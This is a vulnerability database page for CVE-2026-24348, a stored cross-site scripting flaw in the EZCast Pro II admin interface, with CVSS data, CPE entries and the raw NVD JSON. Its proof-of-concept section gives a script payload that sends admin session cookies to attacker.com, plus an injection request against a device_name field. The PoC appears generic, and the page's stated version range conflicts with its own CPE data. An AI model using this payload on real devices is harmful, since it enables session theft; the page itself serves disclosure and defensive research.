Security Vulnerability Report
CVE-2026-24348 CVSS 6.1 MEDIUM

CVE-2026-24348

Published: 2026-01-27 10:15:49
Last Modified: 2026-02-05 17:24:11

Description

Multiple cross-site scripting vulnerabilities in Admin UI of EZCast Pro II version 1.17478.146 allow attackers to execute arbitrary JavaScript code in the browser of other Admin UI users.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:nimbletech:ezcast_pro_dongle_ii_firmware:1.17478.146:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nimbletech:ezcast_pro_dongle_ii:-:*:*:*:*:*:*:* - NOT VULNERABLE
EZCast Pro II < 1.17478.146

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-24348 Stored XSS PoC for EZCast Pro II Admin UI
// Target: EZCast Pro II version 1.17478.146 Admin Management Interface
// Inject malicious JavaScript via vulnerable input field in Admin UI
// This PoC demonstrates the XSS payload execution

const xssPayload = '<script>\n' +
  ' // Steal admin session cookies ' +
  ' var stolenCookies = document.cookie; ' +
  ' ' +
  ' // Send stolen data to attacker-controlled server ' +
  ' fetch("https://attacker.com/collect?data=" + encodeURIComponent(stolenCookies), { ' +
  ' method: "GET", ' +
  ' mode: "no-cors" ' +
  ' }); ' +
  ' ' +
  ' // Alternative payload: DOM-based cookie theft ' +
  ' document.write("<img src=x onerror=\'" ' +
  ' + "fetch(\"https://attacker.com/steal?cookie=" + document.cookie + "\")" ' +
  ' + "\' />"); ' +
  '</script>';

// HTTP Request to inject payload (example POST request)
const httpRequest = `POST /admin/settings HTTP/1.1
Host: target-ezcast-pro.local
Content-Type: application/x-www-form-urlencoded
Cookie: admin_session=xxxxx

device_name=${encodeURIComponent(xssPayload)}&submit=Save`;

console.log("XSS Payload Injected:");
console.log(xssPayload);
console.log("\nWhen admin visits the affected page, the script will execute in their browser context.");

References

https://hub.ntc.swiss/ntcf-2025-145332 (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24348", "sourceIdentifier": "[email protected]", "published": "2026-01-27T10:15:49.360", "lastModified": "2026-02-05T17:24:11.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple cross-site scripting vulnerabilities in Admin UI of EZCast Pro II version 1.17478.146 allow attackers to execute arbitrary JavaScript code in the browser of other Admin UI users."}, {"lang": "es", "value": "Múltiples vulnerabilidades de cross-site scripting en la Admin UI de EZCast Pro II versión 1.17478.146 permiten a los atacantes ejecutar código JavaScript arbitrario en el navegador de otros usuarios de la Admin UI."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NO", "Recovery": "USER", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nimbletech:ezcast_pro_dongle_ii_firmware:1.17478.146:*:*:*:*:*:*:*", "matchCriteriaId": "D9C1B80A-D748-40B9-B2FB-476107B3D705"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nimbletech:ezcast_pro_dongle_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "0621F0E0-6ABB-46E2-8E85-22C8695ACE87"}]}]}], "references": [{"url": "https://hub.ntc.swiss/ntcf-2025-145332", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}